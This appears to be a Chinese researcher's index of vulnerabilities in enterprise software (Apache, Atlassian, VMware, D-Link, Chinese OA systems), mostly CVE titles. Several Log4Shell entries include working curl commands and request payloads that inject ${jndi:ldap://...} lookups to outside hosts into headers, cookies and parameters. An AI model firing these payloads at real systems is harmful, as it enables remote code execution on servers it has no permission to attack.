关于漏洞研究,我想引用图南&Veraxy@QAX CERT这篇文章《一个简单的 RCE 漏洞到底能挖出什么知识》中的一段话来给出我的理解:
漏洞研究其实不应该只盯着漏洞本身,漏洞可以扩展的知识点太多了:
- 偏应用架构:了解这个软件/组件/中间件是干什么的的、尝试搭建起来写点测试代码看看跑起来的样子;
- 偏底层原理:漏洞涉及的相关知识点,可能是Linux/Windows相关的,文件相关的,甚至是某个协议规范、某个算法的实现、某个数据结构、某种设计思想;
- 偏攻击利用:漏洞如何EXP化、如何回显搞定不出网的环境、如何让内网设备无感知攻击的存在、如何加载内存马等;
- 偏漏洞挖掘:举一反三,寻找类似的利用点,或者这个新的软件/组件/中间件是否能带给你一些新的漏洞挖掘思路。
经验心得
- Apache APISIX
- Apache Druid
- Apache Flink
- Apache HTTP Server
- Apache JSPWiki
- Apache OFBiz
- Apache ShenYu
- Apache SkyWalking
- Apache Solr
- Apache Storm
- Apache Struts2
- Atlassian Confluence
- Atlassian Crowd
- Atlassian Jira
- Citrix
- Cisco
- Coremail
- D-Link
- ECShop
- Eyou-亿邮
- Exchange
- F5 BIG-IP
- FineReport-帆软
- Gitlab
- Grafana
- Harbor
- H3C
- K-金蝶
- Lanproxy
- Laravel
- Live800
- MeterSphere
- Jboss
- Jellyfin
- Jetty
- J-金山终端安全系统
- OA-金和
- OA-蓝凌
- OA-泛微
- OA-然之协同
- OA-致远
- OA-通达
- OA-万户
- OA-信呼
- Phpstudy
- Q-齐治堡垒机
- Ruijie-锐捷
- RuoYi-偌依
- SpiderFlow
- Spring
- Thinkadmin
- ThinkPHP3
- ThinkPHP5
- T-360天擎
- Typecho
- VMware
- Weblogic
- Yonyou-用友
- 🎯 CVE-2021-45232 Apache APISIX Dashboard Pre-Auth RCE
- 🎯 Apache Druid RCE via Log4shell
# tested curl -vv -X DELETE "http://10.10.10.139:8081/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fcpy1p.aliyundun.net%7d" # haven't tested http://0.0.0.0:8888/druid/coordinator/${jndi:ldap://0.0.0.0/123} http://0.0.0.0:8888/druid/indexer/${jndi:ldap://0.0.0.0/123} http://0.0.0.0:8888/druid/v2/${jndi:ldap://0.0.0.0/123}
- 🎯 CVE-2020-17518(Apache Flink 目录遍历/文件写入漏洞-Upload)
2021-01 - 🎯 CVE-2020-17519(Apache Flink 目录遍历/文件读取漏洞-jobmanager/logs)b
2021-01 - 🎯 CVE-2021-44228(Apache Flink RCE via Log4shell)
- 🎯 CVE-2021-41773(Apache HTTP Server Path Traversal and Remote Code Execution)
- 🎯 CVE-2021-42013(Apache HTTP Server Path Traversal and Remote Code Execution)
- 🎯 CVE-2021-44140 Apache JSPWiki Arbitrary file deletion on logout
- 🎯 Apache JSPWiki RCE via Log4shell
http://0.0.0.0:8080/Edit.jsp?page=Main X-Forwarded-For:${jndi:dns://0.0.0.0/123}
- 🎯 CVE-2020-9496 Apache Ofbiz 远程代码执行漏洞
- 🎯 CVE-2021-26295 Apache OFBiz 远程代码执行漏洞
- 🎯 Apache OFBiz RCE via Log4shell
# 1、 GET: https://0.0.0.0:8443/webtools/control/main Cookie: OFBiz.Visitor=${jndi:ldap://0.0.0.0/123} # 2、 POST: https://0.0.0.0:8443/webtools/control/setLocaleFromBrowser Content-Type: text/html;charset=UTF-8${jndi:ldap://0.0.0.0/123}
- 🎯 CVE-2021-37580 Apache ShenYu 身份验证绕过漏洞
- 🎯 Apache SkyWalking RCE via Log4shell
POST: http://0.0.0.0:8080/graphql data: {"query":"${jndi:dns://0.0.0.0/123}","variables":{"duration":{"start":"2021-12-22 1259","end":"2021-12-22 1314","step":"MINUTE"}}}
- 🎯 Apache SkyWalking RCE via Log4shell
/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://0.0.0.0/123%7D&wt=json /solr/admin/info/system?_=${jndi:ldap://0.0.0.0/123}&wt=json /solr/admin/cores?_=&action=&config=&dataDir=&instanceDir=${jndi:ldap://0.0.0.0/123}&name=
- 🎯 CVE-2021-38294 Apache Storm 反序列化漏洞
- 🎯 CVE-2021-40865 Apache Storm 命令注入漏洞
- 🎯 CVE-2019-3396 Atlassian Confluence 路径穿越漏洞
- 🎯 CVE-2021-26084 Atlassian Confluence OGNL 注入漏洞-可回显)
- 🎯 CVE-2021-26085 Atlassian Confluence任意文件读取漏洞(受限)
- 🎯 CVE-2019-11580 Atlassian Crowd RCE
- 🎯 CVE-2021-26086 (Jira 文件读取漏洞)
- 🎯 CVE-2020-29453 (Jira 文件读取漏洞)
- 🎯 CVE-2020-14181 (Jira 用户名枚举漏洞)
- 🎯 CVE-2019-8451 (Jira 未授权SSRF漏洞)
- 🎯 CVE-2019-8442 (Jira 未授权+信息泄露漏洞)
- 🎯 CVE-2019-3402 (Jira 反射型XSS漏洞)
- 🎯 CVE-2019-8444 (Jira 存储型XSS漏洞)
- 🎯 CVE-2017-9506 (Jira URL跳转漏洞)
- 🎯 CVE-2020-8209(Citrix XenMobile 目录遍历/任意文件读取漏洞)
- 🎯 Citrix XenMobile RCE via Log4shell
# Source: https://twitter.com/twcsftech/status/1471716640606007299 curl https://<TARGET>/zdm/cxf/login -H 'Referer: https://<TARGET>/zdm' -d 'login=${jndi:ldap://<PAYLOAD>/wibtio}&password=' -k
- 🎯 CVE-2020-3452(Cisco ASAFTD任意文件读取漏洞)
- 🎯 ~~Coremail 邮件系统 action.jsp 任意文件上传漏洞 ~~
fake - 🎯 Coremail 任意用户密码修改漏洞
- 🎯 CVE-2020-25078(D-Link DCS-2530L 敏感信息泄露漏洞)
2021-04 - 🎯 CVE-2018-6530(D-Link 远程命令执行漏洞)
- 🎯 CVE-2019-7297(D-Link DIR-823G 命令注入漏洞)
- 🎯 CVE-2019-7298(D-Link DIR-823G 命令注入漏洞)
- 🎯 CVE-2019-13128(D-Link DIR-823G 命令注入漏洞)
- 🎯 CVE-2019-15529(D-Link DIR-823G 命令注入漏洞)
- 🎯 CVE-2019-17621(D-Link DIR-859 远程代码执行漏洞)
- 🎯 CNVD-2018-01084(D-Link DIR-615/645/815 命令注入漏洞)
- 🎯 CVE-2018-17063(D-Link DIR-816 A2 命令注入漏洞)
- 🎯 CVE-2020-24581(D-link DSL-2888A 远程代码执行)
- 🎯 ECShop v2.x/3.x 远程代码执行漏洞
- 🎯 ECShop v3.0 SQL注入漏洞-flow.php
- 🎯 ECShop v2.6.1 SQL注入漏洞-uc.php
- 🎯 ECShop v4.1.0 SQL注入漏洞-/ecshop/delete_cart_goods.php
- 🎯 ECShop v2.7.3 SQL注入漏洞(CVE-2021-43679)
- 🎯 亿邮 远程命令执行漏洞-/webadm/?q=moni_detail.do&action=gragh
- 🎯 CVE-2021-26855(Exchange SSRF漏洞)
- 🎯 ProxyLogon (CVE-2021-26855 + CVE-2021-27065)
- 🎯 ProxyOracle (CVE-2021-31195 + CVE-2021-31196)
- 🎯 ProxyShell (CVE-2021-34473 + CVE-2021-34523 + CVE-2021-31207)
- 🎯 CVE-2021-41349 Exchange XSS
- 🎯 CVE-2020-5902(F5 BIG-IP远程代码执行漏洞)
2021-01 - 🎯 CVE-2021-22986(F5 BIG-IP远程代码执行漏洞)
2021-03
- 🎯 帆软报表 2012 信息泄露漏洞
2021-05 - 🎯 帆软报表 回显SSRF/任意文件读取漏洞
2021-05 - 🎯 帆软报表 v8 任意文件读取漏洞(CNVD-2018-04757)
2021-05 - 🎯 帆软报表 v8 目录遍历漏洞
2021-08 - 🎯 帆软报表 v9 任意文件上传(非覆盖-CNVD-2021-34467)
2021-05
- 🎯 Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
- 🎯 Grafana 未授权任意文件读取漏洞-/public/plugins/grafana-clock-panel/
- 🎯 CVE-2019-16097 任意管理员注册
- 🎯 H3C IMC dynamiccontent.properties.xhtm 远程命令执行漏洞
2021-05 - 🎯 H3C 下一代防火墙任意文件读取漏洞
2021-05 - 🎯 H3C SecPath 运维审计系统 任意用户登录漏洞
2021-05
- 🎯 金蝶EAS server_file 目录遍历漏洞
- 🎯 CVE-2020-3019 (lanproxy 目录遍历/任意文件读取漏洞)
2021-01
- 🎯 CVE-2021-3129(Laravel Debug RCE)
2021-02
- 🎯 Live800 downloadserver 任意文件下载漏洞
2021-02
- 🎯 CVE-2021-45789 MeterSphere Post-auth 文件读取
/api/automation/file/download
- 🎯 CVE-2021-45790 MeterSphere Pre-auth 文件上传
/resource/md/upload
- 🎯 MeterSphere Plugin Pre-auth RCE
# 上传jar包注册恶意类 /plugin/add # 调用类中的customMethod函数、rce /plugin/customMethod
- 🎯 CVE-2006-5750
- 🎯 CVE-2007-1036
- 🎯 CVE-2010-0738
- 🎯 CVE-2010-1871(JBoss Seam Framework远程代码执行漏洞)
- 🎯 CVE-2015-7501(JBoss JMXInvokerServlet 反序列化漏洞)
2021-01 - 🎯 CVE-2013-4810
- 🎯 CVE-2017-7504(JBoss 4.x JBossMQ JMS 反序列化漏洞)
2021-01 - 🎯 CVE-2017-12149(JBOSS AS 5.x/6.x反序列化命令执行漏洞)
2021-01 - 🎯 CVE-xxxx-xxxxx(JBoss jmx-consoleHtmlAdaptor addURL() 文件上传漏洞)
- 🎯 Jellyfin 任意文件读取漏洞(CVE-2021-21402)
2021-05
- 🎯 Jetty URI路径限制绕过漏洞(CVE-2021-28169)
- 🎯 Jetty URI路径限制绕过漏洞(CVE-2021-28164)
- 🎯 金山终端安全管理系统 v8 任意文件上传漏洞-upload.php
- 🎯 金山终端安全管理系统 v8 任意文件读取漏洞-downfile.php
- 🎯 金山终端安全管理系统 v8 命令执行漏洞-pdf_maker.php
- 🎯 金和OA C6 管理员默认口令
2021-05 - 🎯 金和OA C6 download.asp 任意文件下载漏洞
2021-07
- 🎯 CNVD-2021-01363(蓝凌OA EKP 后台SQL注入漏洞)
2021-04 - 🎯 蓝凌OA custom.jsp SSRF/任意文件读取漏洞
2021-05 - 🎯 蓝凌OA 远程命令执行漏洞(SSRF+XMLDecoder=RCE)
2021-05 - 🎯 蓝凌OA 远程命令执行漏洞(SSRF+JNDI=RCE)
2021-05 - 🎯 CNVD-2020-62240(蓝凌OA SQL注入漏洞-/admin/list/list.aspx)
2021-07
- 📌 weaver_exp
- 🎯 wooyun-2016-0191882(泛微OA SQL注入漏洞-HrmResourceContactEdit.jsp)
- 🎯 wooyun-2016-0178866(泛微OA 某接口任意SQL命令执行漏洞)
- 🎯 wooyun-2016-0169872(泛微OA 任意文件遍历&操作漏洞)
- 🎯 wooyun-2016-0198158(泛微OA SQL注入漏洞)
- 🎯 wooyun-2016-0198158(泛微OA 任意文件读取漏洞)
- 🎯 wooyun-2016-0169453(泛微OA SOAP注入漏洞)
- 🎯 wooyun-2016-0215533(泛微OA 数据库任意操作漏洞-xp_cmdshell)
- 🎯 CNVD-2017-03561(泛微e-mobile login.do表达式注入漏洞)
- 🎯 CNVD-2019-29900(泛微OA 任意文件下载漏洞)
- 🎯 CNVD-2019-29902(泛微OA 任意文件读取漏洞)
- 🎯 CNVD-2019-32204(泛微OA 远程命令执行漏洞)
- 🎯 CNVD-2019-34241(泛微OA 前台SQL注入漏洞-WorkflowCenterTreeData.jsp)
- 🎯 CNVD-2019-40989(泛微OA SQL注入漏洞-SyncUserInfo.jsp)
- 🎯 CNVD-2019-40989(泛微OA SQL注入漏洞-WorkflowCenterTreeData.jsp)
- 🎯 CNVD-2019-41610(泛微OA SQL注入漏洞-validate.jsp)
- 🎯 CNVD-2020-59520(泛微e-bridge 目录遍历/任意文件读取漏洞)
- 🎯 CNVD-xxxx-xxxxx(泛微OA 数据库配置信息泄露漏洞-DBconfigReader.jsp)
- 🎯 CNVD-xxxx-xxxxx(泛微OA 日志信息泄露漏洞-gethrmkq.jsp)
- 🎯 泛微 OA SSRF漏洞
- 🎯 泛微 Eoffice 数据库配置信息泄露漏洞-mysql_config.ini
- 🎯 泛微 OA 前台SQL注入漏洞-/js/hrm/getdata.jsp
- 🎯 泛微 e-mobile6.6 前台RCE
- 🎯 泛微 OA 任意文件上传漏洞-sysinterface/codeEdit.jsp
- 🎯 泛微 OA V9 uploadOperation.jsp 文件上传漏洞
- 🎯 泛微 OA WorkflowServiceXml 绕过访问限制漏洞(RCE)
- 🎯 泛微 OA 任意文件上传漏洞-cloudstore
- 🎯 泛微 OA v8 任意文件下载漏洞
- 🎯 泛微 OA 任意文件上传漏洞-KtreeUploadAction
- 🎯 泛微 OA 任意文件上传漏洞-ExcelUploadServlet
- 🎯 泛微 Eoffice v10 SQL注入漏洞-leave_record.php
- 🎯 CNVD-2021-49104 泛微 Eoffice v9 文件上传漏洞-UploadFile.php
- 🎯 然之协同系统 v4.6.1 SQL注入
- 🎯 然之协同系统 v4.6.1 SQL注入->文件删除
- 🎯 然之协同系统 v4.6.1 SQL注入->文件下载
- 🎯 然之协同系统 v4.6.1 SQL注入-文件删除->RCE
- 🎯 然之协同系统 v4.6.1 喧喧聊天系统 RCE
- 📌 seeyou_exp
- 🎯 致远OA Session泄露漏洞-/yyoa/ext/https/getSessionList.jsp
- 🎯 致远OA 帆软报表组件 前台XXE漏洞
- 🎯 致远OA 帆软报表v8.0 后台文件上传漏洞
- 🎯 致远OA A6 信息泄露漏洞-createMysql
- 🎯 致远OA A6 信息泄露漏洞-DownExcelBeanServlet
- 🎯 致远OA A6 信息泄露漏洞-initDataAssess
- 🎯 致远OA A6 setextno.jsp SQL注入漏洞
- 🎯 致远OA A6 test.jsp SQL注入漏洞
- 🎯 致远OA A6 search_result.jsp SQL注入漏洞
- 🎯 致远OA A6 webmail.do 任意文件下载漏洞
- 🎯 致远OA A8 任意用户密码修改漏洞
- 🎯 致远OA A8 用户名&密码枚举漏洞-/seeyon/getAjaxDataServlet
- 🎯 致远OA A8 任意文件读取漏洞-/seeyon/management/status.jsp
- 🎯 致远OA A8 远程代码执行漏洞-htmlofficeservlet
- 🎯 致远OA ajax.do 未授权访问+任意文件上传漏洞
- 🎯 致远OA Cookie泄露+任意文件上传漏洞
- 🎯 致远OA Fastjson 反序列化漏洞
- 📌 TongdaOA-exp
- 🎯 通达OA v11.9 前台SQL注入-get_datas.php
- 🎯 万户OA文件上传漏洞-/defaultroot/upload/fileUpload.controller
- 🎯 万户OA文件上传漏洞-/defaultroot/officeserverservlet
- 🎯 信呼OA v2.1.7 后台SQL注入漏洞-typeid
- 🎯 信呼OA v2.2.8 后台文件操作->RCE
- 🎯 信呼OA v2.2.8 后台SQL注入->RCE
- 🎯 信呼OA v2.3.0 后台配置文件->RCE
- 🎯 phpstudy backdoor
- 🎯 齐治堡垒机任意用户登录漏洞
2021-05
- 🎯 RG-EG系列(锐捷-EWEB网管系统命令注入-/guest_auth/guestIsUp.php)
2021-01 - 🎯 CNVD-2021-14536(RG-UAC统一上网行为管理审计系统信息泄露漏洞)
- 🎯 锐捷EG易网关 branch_passw.php 远程命令执行漏洞
- 🎯 锐捷EG易网关 cli.php 远程命令执行漏洞
- 🎯 锐捷EG易网关 download.php 后台任意文件读取漏洞
- 🎯 RuoYi 后台模板注入漏洞
- 🎯 RuoYi <= v4.6.2 (后台)反序列化漏洞-snakeyaml
- 🎯 RuoYi <= v4.6.1 (后台)SQL注入漏洞-/system/role/list
- 🎯 RuoYi <= v4.5.0 (后台)任意文件下载漏洞-/common/download/resource
- 🎯 RuoYi <= v4.4.0 Shiro权限认证绕过漏洞
- 🎯 RuoYi <= v4.3.0 Shiro反序列化漏洞
- 🎯 RuoYi <= v4.3.0 Shiro权限认证绕过漏洞
- 🎯 RuoYi <= v3.2.0 SQL注入漏洞
- 🎯 SpiderFlow RCE via Nashorn
- 🎯 CVE-xxxx-xxxx SpringBoot Actuator未授权访问漏洞
- 🎯 CVE-2018-1271 Spring MVC目录穿越/遍历漏洞
- 🎯 CVE-2019-3799 Spring Cloud Config Server 路径穿越/任意文件读取漏洞
- 🎯 CVE-2020-5405 Spring Cloud Config Server路径遍历漏洞
- 🎯 CVE-2020-5410 Spring Cloud Config目录穿越/遍历漏洞
- 🎯 CVE-2020-5412 Spring Cloud Netflix Hystrix Dashboard SSRF漏洞-proxy.stream
- 🎯 CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal
- 🎯 CVE-2020-25540(目录遍历/任意文件读取漏洞)
- 🎯 CNVD-2020-33163
- 🎯 ThinkPHP3.2.x RCE(文件包含->RCE)
- 🎯 360天擎 SQL注入漏洞
2021-05 - 🎯 360天擎 数据库信息泄露漏洞
2021-05
- 🎯 Typecho v1.0 SSRF漏洞- xmlrpc
2021-01-11 - 🎯 CVE-2018-18753(Typecho v1.1 反序列化漏洞-install.php)
- 🎯 VMware vCenter 远程命令执行漏洞(CVE-2021-21972)
- 🎯 VMware vRealize Operations Manager SSRF(CVE-2021-21975)
- 🎯 VMware vCenter 远程代码执行漏洞(CVE-2021-21985-回显)
- 🎯 VMware vCenter 任意文件读取漏洞-/eam/vib?id=
- 🎯 VMware vCenter Server 文件上传漏洞(CVE-2021-22005)
- 🎯 VMware vCenter SSRF/任意文件读取漏洞-/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=
- 🎯 VMware View Planner 远程代码执行漏洞(CVE-2021-21978)
- 🎯 Vmware Product RCE via Log4Shell
- 📌 Vm4J
- 🎯 CVE-2020-14882/CVE-2020-14883(WebLogic 未授权命令执行漏洞)
- 🎯 CVE-2020-14750 权限绕过
- 🎯 用友人力资源管理软件(e-HR)XXE漏洞
- 🎯 用友 FE协作办公平台1.0信息泄露漏洞
- 🎯 用友 NC 5.7 跨站脚本漏洞
- 🎯 用友 ERP-NC hrss/ELTextFile.load.d 任意文件读取漏洞
- 🎯 用友 NC本地文件包含漏洞-NCFindWeb
- 🎯 用友 NC财务系统跨站脚本漏洞
- 🎯 用友 TurboCRM /ajax/getemaildata.php 任意文件读取漏洞
- 🎯 用友 UA-PWS XXE漏洞
- 🎯 用友 FE协作办公系统 addUser.jsp SQL注入漏洞
2021-02 - 🎯 用友 FE协作办公系统 codeMoreWidget.jsp SQL注入漏洞
2021-02 - 🎯 用友 ICC客服系统 getfile.jsp 任意文件下载漏洞
2021-02 - 🎯 用友 ICC客服系统跨站脚本漏洞
2021-02 - 🎯 用友 NC-IUFO系统跨站脚本漏洞
2021-02 - 🎯 用友 TruboCRM管理系统 /background/ 三处SQL注入漏洞
2021-02 - 🎯 用友 TruboCRM管理系统 /login/forgetpswd.php SQL注入漏洞
2021-02 - 🎯 CNVD-2020-49261(用友GRP-U8 SQL注入漏洞)
- 🎯 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
- 🎯 用友GRP-U8 SQL注入漏洞
2021-05 - 🎯 用友 NCCloud FS文件管理SQL注入漏洞
2021-05 - 🎯 用友 U8 OA test.jsp SQL注入漏洞
2021-05 - 🎯 用友 NC6.5 任意文件上传漏洞-FileReceiveServlet
- 🎯 用友 NC 反序列化漏洞